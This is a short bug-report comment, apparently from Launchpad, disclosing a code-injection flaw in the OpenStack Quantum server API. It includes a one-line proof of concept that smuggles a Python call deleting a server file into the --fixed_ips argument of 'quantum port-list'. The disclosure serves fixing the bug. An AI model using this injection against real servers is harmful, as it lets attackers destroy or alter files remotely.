Comment 1 for bug 1052179

Revision history for this message
Mark McClain (markmcclain) wrote :

The exploit can be triggered via the API. The following exploit will delete a file on the Quantum Server:

quantum port-list -- --fixed_ips "cfg.os.remove('/tmp/foo')"